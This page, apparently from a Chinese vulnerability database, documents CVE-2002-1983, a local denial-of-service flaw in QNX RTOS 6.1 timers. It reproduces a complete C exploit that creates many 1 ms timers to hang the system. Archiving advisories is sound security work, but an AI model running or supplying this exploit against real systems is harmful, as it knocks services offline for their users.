QNX TimeCreate本地服务拒绝漏洞

QNX TimeCreate本地服务拒绝漏洞

漏洞ID 1107080 漏洞类型 其他
发布时间 2002-11-06 更新时间 2005-10-20
图片[1]-QNX TimeCreate本地服务拒绝漏洞-安全小百科CVE编号 CVE-2002-1983
图片[2]-QNX TimeCreate本地服务拒绝漏洞-安全小百科CNNVD-ID CNNVD-200212-479
漏洞平台 Unix CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/21984
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-479
|漏洞详情
QNXRTOS6.1.0版本的计时器装置存在漏洞。本地用户通过创建多个带有1-ms滴答的计时器导致服务拒绝(挂起)且可能执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/6114/info

A denial of service vulnerability has been discovered in QNX.

It has been reported that it is possible for unprivileged users to cause QNX systems to stop responding, by creating multiple timers containing specific characteristics.

It should be noted that this issue was reported for QNX 6.1. It is not yet known whether this issue affects other releases.

/*
 * QNX RTP 6.1 Local DoS exploit
 *
 * author: Pawel Pisarczyk <[email protected]>, 2002
 *
 * After compilation and output binary execution system hangs.
 */
 
#include <errno.h>
#include <stdio.h>
#include <stddef.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/neutrino.h>
#include <inttypes.h>


int main(int argc, char *argv[])
{
	struct sigevent event;
	struct _itimer itimer;
	int chid;
	int tmid;
	int coid;
	int k;
		

	if ((chid = ChannelCreate(0)) < 0) {
		fprintf(stderr, "Can't create channel!n");
		exit(-1);
	}
	
	if ((coid = ConnectAttach(0, getpid(), chid, 0, 0)) < 0) {
		fprintf(stderr, "Can't connect to channel!n");
		exit(-1);
	}
	
	
	for (k = 0; k < 16; k++) {
	
		SIGEV_PULSE_INIT(&event, coid, 16, _PULSE_CODE_MINAVAIL + 1, k);
		
		if ((tmid = TimerCreate(CLOCK_REALTIME, &event)) < 0) {
			fprintf(stderr, "Can't create timer!n");
			return -1;
		}


		itimer.nsec = 1000000;
		itimer.interval_nsec = 1000000;
		TimerSettime(tmid, 0, &itimer, NULL);
	}
	
	
	while (getc(stdin) != '#');
	return 0;
}
|参考资料

来源:XF
名称:qnx-rtp-timer-dos(10550)
链接:http://xforce.iss.net/xforce/xfdb/10550
来源:BID
名称:6114
链接:http://www.securityfocus.com/bid/6114
来源:BUGTRAQ
名称:20021106QNX6.1TimeCreateweakness
链接:http://online.securityfocus.com/archive/1/298689

相关推荐: UnixWare SU Command Line Buffer Overflow Vulnerability

UnixWare SU Command Line Buffer Overflow Vulnerability 漏洞ID 1103151 漏洞类型 Boundary Condition Error 发布时间 2001-06-26 更新时间 2001-06-26 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享